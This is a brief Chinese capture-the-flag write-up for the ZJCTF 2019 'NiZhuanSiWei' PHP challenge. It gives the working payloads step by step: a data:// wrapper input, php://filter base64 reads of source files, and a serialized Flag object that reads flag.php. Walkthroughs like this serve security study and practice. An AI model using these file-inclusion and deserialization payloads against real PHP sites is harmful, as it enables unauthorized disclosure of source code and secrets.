[ZJCTF 2019]NiZhuanSiWei1

  • 开发
  • 32

代码审计,要传三个参数,首先要text的内容等于welcome to the zjctf ,但是这里用了file_get_content()而不是简单的字符串相等,考虑使用php伪协议传入数据。

详见PHP伪协议总结 - 个人文章 - SegmentFault 思否 

 所以有

text=data://text/plain,welcome to the zjctf

 

下面接着include了file,旁边提示了useless.php,直接include它,是空白页面,接着用伪协议获取源码。

file=php://filter/read=convert.base64-encode/resource=useless.php

base64解码后我们得到了,

 

结合一开始的password反序列化,可以让Flag里面的file再通过伪协议读取flag.php源码

 

运行得到

O:4:"Flag":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";} 

让password等于上面这串 ,得到base64再解码

得到flag

 

阅读全部

相关推荐

  9. [COCI2018-2019#1] Zamjena 解题记录

    2024-01-26 03:36:01       17 阅读

最近更新

  4. TCP协议是安全的吗?

    2024-01-26 03:36:01       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-26 03:36:01       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-01-26 03:36:01       18 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-01-26 03:36:01       20 阅读

热门阅读

  2. python爬虫

    2024-01-26 03:36:01       38 阅读

  3. Imagenet-A,Imagenet-C和ImageNet-O

    2024-01-26 03:36:01       29 阅读

  8. Rust Web小项目

    2024-01-26 03:36:01       35 阅读

  11. 扩展坞 接两个显示器

    2024-01-26 03:36:01       35 阅读

  12. 实习记录——第三天

    2024-01-26 03:36:01       38 阅读

  16. AcWing.表达式求值模板题

    2024-01-26 03:36:01       36 阅读

  17. Egg框架搭建后端服务【6】- 上传图片和图片回显

    2024-01-26 03:36:01       37 阅读

  18. Modern C++ std::move的实现原理

    2024-01-26 03:36:01       33 阅读

  20. 慎用少用c++的static和extern变量-几个常见错误

    2024-01-26 03:36:01       36 阅读

  23. 【力扣 50】Pow(x, n) C++题解(数学+递归+快速幂)

    2024-01-26 03:36:01       30 阅读